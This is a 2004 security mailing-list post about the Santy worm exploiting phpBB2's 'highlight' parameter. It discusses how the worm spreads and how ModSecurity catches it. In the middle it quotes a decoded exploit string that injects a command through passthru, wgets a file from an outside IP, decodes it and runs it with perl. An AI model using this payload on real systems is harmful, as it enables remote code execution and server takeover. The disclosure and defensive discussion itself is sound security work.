Full Disclosure mailing list archives
RE: RE: Worm hitting PHPbb2 Forums
From: Paul Laudanski <zx () castlecops com>
Date: Thu, 23 Dec 2004 23:40:46 -0500 (EST)
On Thu, 23 Dec 2004, Patrick Nolan wrote:
A bot is not uploaded, not sure where that came from. And by now, it is not expected to be spreading at all, thanks to the interruption in search requests by Google.
There are a couple posts going on about this, for instance take this article: http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35 [quote] "Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The exploit it uses is only able to transfer around 20 bytes of data at a time. So the worm transfers itself from one web site to another in small chunks." "If a chunk gets missing, the worm might still work fine... or it might fail," Hypponen told ComputerWire. "More generations there are, more likely it is to fail because of this." [/quote] Compare that to an exploit that is posted @bugtraq: http://www.securityfocus.com/archive/1/385208 (decoded) [quote] rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_ highlight='.passthru($HTTP_GET_VARS[rush]).' [/quote] It is making use of the highlight exploit in pre phpbb 2.0.11. Even though the 'worm' itself may be hindered, we can certainly expect script kiddies to attempt these manually. http://www.modsecurity.org/blog/archives/000046.html Now that is catching the single quote in the highlight argument. -- Regards, Paul Laudanski - Computer Cops, LLC. CEO & Founder CastleCops(SM) - http://castlecops.com Promoting education and health in online security and privacy. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Worm hitting PHPbb2 Forums David Devault (Dec 21)
- <Possible follow-ups>
- RE: Worm hitting PHPbb2 Forums Christopher Adickes (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mike (Dec 22)
- RE: Worm hitting PHPbb2 Forums M. Shirk (Dec 21)
- Re: RE: Worm hitting PHPbb2 Forums Willem Koenings (Dec 22)
- RE: RE: Worm hitting PHPbb2 Forums Patrick Nolan (Dec 23)
- RE: RE: Worm hitting PHPbb2 Forums Paul Laudanski (Dec 23)
- Re: Worm hitting PHPbb2 Forums mark (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mattias R. Lindgren (Dec 23)